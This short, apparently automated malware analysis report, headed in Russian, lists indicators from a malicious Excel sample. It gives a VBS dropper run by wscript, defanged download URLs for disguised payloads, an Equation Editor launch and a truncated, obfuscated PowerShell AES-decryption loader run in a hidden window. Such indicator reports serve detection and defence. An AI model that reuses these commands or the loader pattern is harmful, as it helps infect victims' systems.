Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\weseethesimplethingsalwaystog.vBS"
- %APPDATA%\weseethesimplethingsalwaystog.vbs
- <Текущая директория>\d36f0000
- <PATH_SAMPLE>.xls
- 'tn#.wtf':80
- '17#.#45.123.11':80
- '19#.#6.176.133':80
- http://tn#.wtf/Zfp4WP
- http://17#.#45.123.11/47/eg/seethedrinkingwatereverythweretoundesandhowmuchgreatrainingisgoingeverywerenobodyunderstandthegreat_______newgirlfrndsheismygirl.doc
- http://17#.#45.123.11/47/weseethesimplethingsalwaystoget.gIF
- http://19#.#6.176.133/Upload/vbs.jpeg
- DNS ASK tn#.wtf
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMana... (со скрытым окном)